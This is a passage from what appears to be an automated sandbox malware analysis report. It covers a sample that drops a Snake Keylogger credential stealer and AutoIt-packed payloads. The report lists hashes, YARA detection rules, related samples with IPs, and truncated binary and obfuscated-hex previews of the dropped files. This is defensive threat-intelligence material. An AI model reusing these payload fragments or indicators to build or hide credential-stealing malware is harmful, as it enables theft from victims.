                                                                  CLOUDFLARENETUS2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.16.1
                                                                  NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                  • 188.114.97.3
                                                                  https://cjerichmond.jimdosite.com/Get hashmaliciousUnknownBrowse
                                                                  • 162.159.128.70
                                                                  zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                  • 188.114.96.3
                                                                  tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.32.1
                                                                  https://zfrmz.com/3GiGYUP4BArW2NBgkPU3Get hashmaliciousUnknownBrowse
                                                                  • 104.18.94.41
                                                                  Play_VM-NowTingrammAudiowav011.htmlGet hashmaliciousUnknownBrowse
                                                                  • 104.17.25.14
                                                                  https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNfGet hashmaliciousUnknownBrowse
                                                                  • 104.17.203.31
                                                                  New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.64.1
                                                                  4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.96.1

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9ad2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.16.1
                                                                  tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.16.1
                                                                  New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.16.1
                                                                  4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.16.1
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.16.1

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exefilepdf.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                    Invoice-UPS-218931.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EmbeddedExe2.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1039
                                                                      Entropy (8bit):5.353332853270839
                                                                      Encrypted:false
                                                                      SSDEEP:24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
                                                                      MD5:A4AF0F36EC4E0C69DC0F860C891E8BBE
                                                                      SHA1:28DD81A1EDDF71CBCBF86DA986E047279EF097CD
                                                                      SHA-256:B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
                                                                      SHA-512:A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.360398796477698
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                      C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1663264
                                                                      Entropy (8bit):6.929148215184974
                                                                      Encrypted:false
                                                                      SSDEEP:49152:Plp9tHfYoEaTSiz23THT3WSMpDgF/qB0Rj6KIeVSc/zui+:PX/LEQkF/qBk6K2c/ii+
                                                                      MD5:5EFEF6CC9CD24BAEEED71C1107FC32DF
                                                                      SHA1:3CFC9764083154F682A38831C8229E3E29CBE3EF
                                                                      SHA-256:E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
                                                                      SHA-512:CECD98F0E238D7387B44838251B795BB95E85EC8D35242FC24532BA21929759685205133923268BF8BC0E2DED37DB7D88ECBE2B692D2BE6F09C6D92A57D1FDAC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: filepdf.pdf.lnk.download.lnk, Detection: malicious, Browse
                                                                      • Filename: Invoice-UPS-218931.pdf.lnk.mal.lnk, Detection: malicious, Browse
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."............................@....................................q ....`..................................................H..........@.......8m...... W...................................=..(...0...@............S...............................text...V........................... ..`.rdata..\...........................@..@.data....U..........................@....pdata..8m.......n..................@..@.00cfg..8...........................@..@.gxfg...`*.......,..................@..@.tls.................:..............@..._RDATA..\............<..............@..@.rsrc...@............>..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):134144
                                                                      Entropy (8bit):5.82580911380658
                                                                      Encrypted:false
                                                                      SSDEEP:3072:999yINAgKjV545jbvk5Hbe7fMuJN07TU2DzdKm+Dvb58mzmWuwvcXpY5bY:AINAgKjV5Cjbvk5Hbe7fMuJN07TKvbWS
                                                                      MD5:099EB488DBC2288AB41C4EF64EA7DBA4
                                                                      SHA1:BBE8B04FFE0E755DBEB28656057B4A92504B3DE6
                                                                      SHA-256:469EFD50AD0AF080469805BA5A2A2A253B968699E746D79B7AA1C98398C159A7
                                                                      SHA-512:B64AAFFC46CED9F2C9A2B7EFB501FB06BD9B4871B0091459035BC8EAA1F5AED331F66C435499892B2BCE00AA239815EBC160A37B3E79BA9235E9EF7EC894F77C
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: unknown
                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Florian Roth
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.f..............P.................. ... ....@.. .......................`............@.................................x...S.... ..o....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...o.... ......................@..@.reloc.......@......................@..B........................H.......\#..............."...............................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....( ...*&..(!....*.s"........s#........s$........s%........s&........*Z........o9...........*&..(:....*&........*".......*Vs....(C...t.........*..(D...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*.......*"~....+.*"~....+.*"~....+.*.......*.*b.r9..p.o....(....(`....*:.~ ....o....&*^..(.......}6.....}7...*V..{9.

                                                                      C:\Users\user\AppData\Local\Temp\aut1FFC.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1474570
                                                                      Entropy (8bit):7.98865159238366
                                                                      Encrypted:false
                                                                      SSDEEP:24576:NGbesrWQ1WW/8y6N4DA2Wtt8iQAq6eftMtajDUYPDyDuskZYsf1QL:2esr1WaF6IWt1QYytMtajjYuVPM
                                                                      MD5:148510110C9D5C7FE1547E8C0C1ED175
                                                                      SHA1:EBA19F2D1410E5B54F4017A45FABE53A07991014
                                                                      SHA-256:B0E45BBB36082C3AE1DF2C02D953188142FE4AF955C6A8FD1A5A2F1CC53FE958
                                                                      SHA-512:9A398C03BE9D4C257F4259E7B1CC17F5C800A024B4A715AFC1BDA2D0099974CCA6E45951483092D501F848C4A4454C6AFC68CA6DA9F0346EFB68253ECCE417DA
                                                                      Malicious:false
                                                                      Preview:EA06......8....M...=..eU....I.^.s.R&UY..nf`..N..4.U.....w..`j....9Z.P.t)..%.W....,.Z..... .V.q.=.3m.N%5k..._..'f...L.3...E.L....S...d.H.S.49...>..MVcc.434..r.2..@.J|.I.4...s] .B`...m"....T.l..i.L....\W@4;'..).0..%Q..j`._7.2...}...e.sW...v.m......O*..(.i...h...r.X....w....j... ...'/@.!E..(4.._..."G$.I}vSM.......&e5`...P..T.y..X.6..h3*}7+.L.T.V`.NS'5z^..H.^k........m ..RcC....I.n.H.T.tX.&.9..&....1..'.`..N...Y...c)n..o.:t.....T)..M...@..5M.',..u"q...@'..J.2...q.e6sV.@.T.-T.._.:u.q}...T.}.qM............<..4.Sj..%.....g...*.3...V*t.t.DP2>z..?H.Wh....-J.T.q..2.`..'.@.bc_.Wj..E..9...u.D.%.M..EJ.3..&UY..?J.C..p..1.....t.{V8.65Q....i..F..Y.N.t.WU.Fi@-.6n...\..?jX.i[.~g....5l.......W[..i2Y.Ry)..jR*.EM.......w..W-P....^..*..8.5....;Z%#.O.I@....].4....9.....EI.W).:...r....0..4.4.8.?^z..L.Uh.9@.Y7...@.Mt..@p?,..C.......z5..+...H.T..h.U'7x..9..Lsr....5p.......>.....=v..7.].E.lty\...Y9T0..l+`.=...;<.T.5...-K..2t.D.5...0.....X...J......h...9X........j..7..

                                                                      C:\Users\user\AppData\Local\Temp\aut2136.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14552
                                                                      Entropy (8bit):7.628369076896627
                                                                      Encrypted:false
                                                                      SSDEEP:384:ITYznwreDrLYun6MkGodxWUtwFKJgWIxptQfkh:IAwaDrL4GNKwwg7tQ8h
                                                                      MD5:2536420BBC42872B770067FDAAB4FF1C
                                                                      SHA1:B8BC443C00D65605175A16F12CCCBC2175DA7681
                                                                      SHA-256:BF6487977C0FD86D9A2B8CCEDA81996DD379AA4E33EF455AA0DB98148B29CC5E
                                                                      SHA-512:4F9E55964870C1373FF358933815E9A1A4C392AEB452507B0988ADB7CBF85AD87E33D420341E94AAFA20D4DD42797E1A2349FB1DBCEECF109042B6D16D6135F6
                                                                      Malicious:false
                                                                      Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                      C:\Users\user\AppData\Local\Temp\aut26A3.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1474570
                                                                      Entropy (8bit):7.98865159238366
                                                                      Encrypted:false
                                                                      SSDEEP:24576:NGbesrWQ1WW/8y6N4DA2Wtt8iQAq6eftMtajDUYPDyDuskZYsf1QL:2esr1WaF6IWt1QYytMtajjYuVPM
                                                                      MD5:148510110C9D5C7FE1547E8C0C1ED175
                                                                      SHA1:EBA19F2D1410E5B54F4017A45FABE53A07991014
                                                                      SHA-256:B0E45BBB36082C3AE1DF2C02D953188142FE4AF955C6A8FD1A5A2F1CC53FE958
                                                                      SHA-512:9A398C03BE9D4C257F4259E7B1CC17F5C800A024B4A715AFC1BDA2D0099974CCA6E45951483092D501F848C4A4454C6AFC68CA6DA9F0346EFB68253ECCE417DA
                                                                      Malicious:false
                                                                      Preview:EA06......8....M...=..eU....I.^.s.R&UY..nf`..N..4.U.....w..`j....9Z.P.t)..%.W....,.Z..... .V.q.=.3m.N%5k..._..'f...L.3...E.L....S...d.H.S.49...>..MVcc.434..r.2..@.J|.I.4...s] .B`...m"....T.l..i.L....\W@4;'..).0..%Q..j`._7.2...}...e.sW...v.m......O*..(.i...h...r.X....w....j... ...'/@.!E..(4.._..."G$.I}vSM.......&e5`...P..T.y..X.6..h3*}7+.L.T.V`.NS'5z^..H.^k........m ..RcC....I.n.H.T.tX.&.9..&....1..'.`..N...Y...c)n..o.:t.....T)..M...@..5M.',..u"q...@'..J.2...q.e6sV.@.T.-T.._.:u.q}...T.}.qM............<..4.Sj..%.....g...*.3...V*t.t.DP2>z..?H.Wh....-J.T.q..2.`..'.@.bc_.Wj..E..9...u.D.%.M..EJ.3..&UY..?J.C..p..1.....t.{V8.65Q....i..F..Y.N.t.WU.Fi@-.6n...\..?jX.i[.~g....5l.......W[..i2Y.Ry)..jR*.EM.......w..W-P....^..*..8.5....;Z%#.O.I@....].4....9.....EI.W).:...r....0..4.4.8.?^z..L.Uh.9@.Y7...@.Mt..@p?,..C.......z5..+...H.T..h.U'7x..9..Lsr....5p.......>.....=v..7.].E.lty\...Y9T0..l+`.=...;<.T.5...-K..2t.D.5...0.....X...J......h...9X........j..7..

                                                                      C:\Users\user\AppData\Local\Temp\aut2906.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14552
                                                                      Entropy (8bit):7.628369076896627
                                                                      Encrypted:false
                                                                      SSDEEP:384:ITYznwreDrLYun6MkGodxWUtwFKJgWIxptQfkh:IAwaDrL4GNKwwg7tQ8h
                                                                      MD5:2536420BBC42872B770067FDAAB4FF1C
                                                                      SHA1:B8BC443C00D65605175A16F12CCCBC2175DA7681
                                                                      SHA-256:BF6487977C0FD86D9A2B8CCEDA81996DD379AA4E33EF455AA0DB98148B29CC5E
                                                                      SHA-512:4F9E55964870C1373FF358933815E9A1A4C392AEB452507B0988ADB7CBF85AD87E33D420341E94AAFA20D4DD42797E1A2349FB1DBCEECF109042B6D16D6135F6
                                                                      Malicious:false
                                                                      Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                      C:\Users\user\AppData\Local\Temp\aut53BE.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1474570
                                                                      Entropy (8bit):7.98865159238366
                                                                      Encrypted:false
                                                                      SSDEEP:24576:NGbesrWQ1WW/8y6N4DA2Wtt8iQAq6eftMtajDUYPDyDuskZYsf1QL:2esr1WaF6IWt1QYytMtajjYuVPM
                                                                      MD5:148510110C9D5C7FE1547E8C0C1ED175
                                                                      SHA1:EBA19F2D1410E5B54F4017A45FABE53A07991014
                                                                      SHA-256:B0E45BBB36082C3AE1DF2C02D953188142FE4AF955C6A8FD1A5A2F1CC53FE958
                                                                      SHA-512:9A398C03BE9D4C257F4259E7B1CC17F5C800A024B4A715AFC1BDA2D0099974CCA6E45951483092D501F848C4A4454C6AFC68CA6DA9F0346EFB68253ECCE417DA
                                                                      Malicious:false
                                                                      Preview:EA06......8....M...=..eU....I.^.s.R&UY..nf`..N..4.U.....w..`j....9Z.P.t)..%.W....,.Z..... .V.q.=.3m.N%5k..._..'f...L.3...E.L....S...d.H.S.49...>..MVcc.434..r.2..@.J|.I.4...s] .B`...m"....T.l..i.L....\W@4;'..).0..%Q..j`._7.2...}...e.sW...v.m......O*..(.i...h...r.X....w....j... ...'/@.!E..(4.._..."G$.I}vSM.......&e5`...P..T.y..X.6..h3*}7+.L.T.V`.NS'5z^..H.^k........m ..RcC....I.n.H.T.tX.&.9..&....1..'.`..N...Y...c)n..o.:t.....T)..M...@..5M.',..u"q...@'..J.2...q.e6sV.@.T.-T.._.:u.q}...T.}.qM............<..4.Sj..%.....g...*.3...V*t.t.DP2>z..?H.Wh....-J.T.q..2.`..'.@.bc_.Wj..E..9...u.D.%.M..EJ.3..&UY..?J.C..p..1.....t.{V8.65Q....i..F..Y.N.t.WU.Fi@-.6n...\..?jX.i[.~g....5l.......W[..i2Y.Ry)..jR*.EM.......w..W-P....^..*..8.5....;Z%#.O.I@....].4....9.....EI.W).:...r....0..4.4.8.?^z..L.Uh.9@.Y7...@.Mt..@p?,..C.......z5..+...H.T..h.U'7x..9..Lsr....5p.......>.....=v..7.].E.lty\...Y9T0..l+`.=...;<.T.5...-K..2t.D.5...0.....X...J......h...9X........j..7..

                                                                      C:\Users\user\AppData\Local\Temp\aut57B7.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14552
                                                                      Entropy (8bit):7.628369076896627
                                                                      Encrypted:false
                                                                      SSDEEP:384:ITYznwreDrLYun6MkGodxWUtwFKJgWIxptQfkh:IAwaDrL4GNKwwg7tQ8h
                                                                      MD5:2536420BBC42872B770067FDAAB4FF1C
                                                                      SHA1:B8BC443C00D65605175A16F12CCCBC2175DA7681
                                                                      SHA-256:BF6487977C0FD86D9A2B8CCEDA81996DD379AA4E33EF455AA0DB98148B29CC5E
                                                                      SHA-512:4F9E55964870C1373FF358933815E9A1A4C392AEB452507B0988ADB7CBF85AD87E33D420341E94AAFA20D4DD42797E1A2349FB1DBCEECF109042B6D16D6135F6
                                                                      Malicious:false
                                                                      Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                      C:\Users\user\AppData\Local\Temp\jailless

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1802240
                                                                      Entropy (8bit):7.6615204739221765
                                                                      Encrypted:false
                                                                      SSDEEP:49152:tfk5Hh4hrRsJ2jiQ6ZSYYl4dmXv+LldnYSnlpn7M:1AhM7OSx0m+flNQ
                                                                      MD5:9CAA0B032F7CC80C213C4ABA37B44BAF
                                                                      SHA1:9958A1F2C9DCBEA4FD20014D946E1F43EF4FD0FC
                                                                      SHA-256:B6909129E4A08A4287055E3660A7A132ED0E8CD32C528D2FEE2CE7B4D07E302C
                                                                      SHA-512:5F04A77C9E9FD782276260A00F96E2125FBF5BB08D0C9D81CFCA94986015B91F473882CFF46E6C67FB35B034B6B71B2386876AE88895E0A13A49FDA054601771
                                                                      Malicious:false
                                                                      Preview:.h.1@2JM=WM3..2U.C2JM9WMsNH2U1C2JM9WM3NH2U1C2JM9WM3NH2U1C2JM.WM3@W.[1.;.l.V..o.Z<BcB8"^%,^n+S;_,Fj/\w?F h[;..}.mT8)V`E?_.C2JM9WMc.H2.0@2..n0M3NH2U1C.JO8\L8NHDN1C:JM9WM3..)U1c2JM.LM3N.2U.C2JO9WI3NH2U1C6JM9WM3NH.N1C0JM9WM3MHr.1C"JM)WM3NX2U!C2JM9W]3NH2U1C2JM9'.(N.2U1C.QM.SM3NH2U1C2JM9WM3NH2U.X2FM9WM3NH2U1C2JM9WM3NH2U1C2JM9WM3NH2U1C2JM9WM3NH2U1C2Jm9WE3NH2U1C2JM9_m3N.2U1C2JM9WM3`<W-EC2J.MLM3nH2UGX2JO9WM3NH2U1C2JM9wM3.f@&C 2JM.SM3N.)U1E2JMALM3NH2U1C2JM9W.3N..'T/])M9[M3NH.N1C0JM9)V3NH2U1C2JM9WMsNHpU1C2JM9WM3NH2U1C..V9WM3N.2U1A2OM..V3.M2U0C2JL9WK.oH2y\X2JM9WM3NH2U1C2JM9WM3NH2U1C2JM9WM3NH2U1C2JV.SMiNH2T1C#8L9W=.LH2S;E.IM9]`4H`6U1I.8V9W=.LH2S:D.IM9]`4I`6U1I..n5%x3N8@.1CBB"<WM9F'4U1I.MM9]e;NH8.1i2JL)WM3NH2c.C.LM9VV.JHEU1C0JM(.D3NB8};C2@OK8M3>`9U1I.FM9]F5L'?U1I>MU!$C3NB?]8,=JM3.G:bN;:!C2@..]E.H@]E1C8.J*R..]L@`1CB849W=1_L]P1C8bJ9WG._H2_%P7.M(Rg3O`2U3C.JD.WG3NH2W1g2T.9]M3NH2U1Cc.M.QM3OV0}#C2@g9WM3n)+U|.JJL9WM7NH2U1C2JM9WM3NHrU1C2JM9WM3NH2U1C2JM9WM3NH2U1C2JM9WMKNH2[..<J.0.l.O..te+[9mI%"T<)_uR"\$"Mw/V

                                                                      C:\Users\user\AppData\Local\Temp\roundups

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):143378
                                                                      Entropy (8bit):2.9922477781505763
                                                                      Encrypted:false
                                                                      SSDEEP:96:AIXLr4w+F05Bnv1SMi0Fl7dSA6zBqDkdGcu19I6yKup3PfrWVjjvqnBaAJZdjurC:H3bjn77+Gcu19I6yKup3nrWVHqnBaA
                                                                      MD5:DEC5B565C13833AE307CB8F290F304F6
                                                                      SHA1:A9ADBCA3C89CBBAB2A4A1B2315EF64B54B0F57F7
                                                                      SHA-256:FAB1B20589F1A83A562933EA0AA4139EFFDFC163291D01DA5A9EC92FE9E36D83
                                                                      SHA-512:0F69CCFBB203CF6FC840277E5C23C5BF71ABBA73A59421A364357CDE2295CA8CC063C3D6302BFBD5947E39AC8C0C2D8FD208FCA281D964E92D650F0381C0337A
                                                                      Malicious:false
                                                                      Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                                                                      C:\Users\user\AppData\Local\konked\lecheries.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
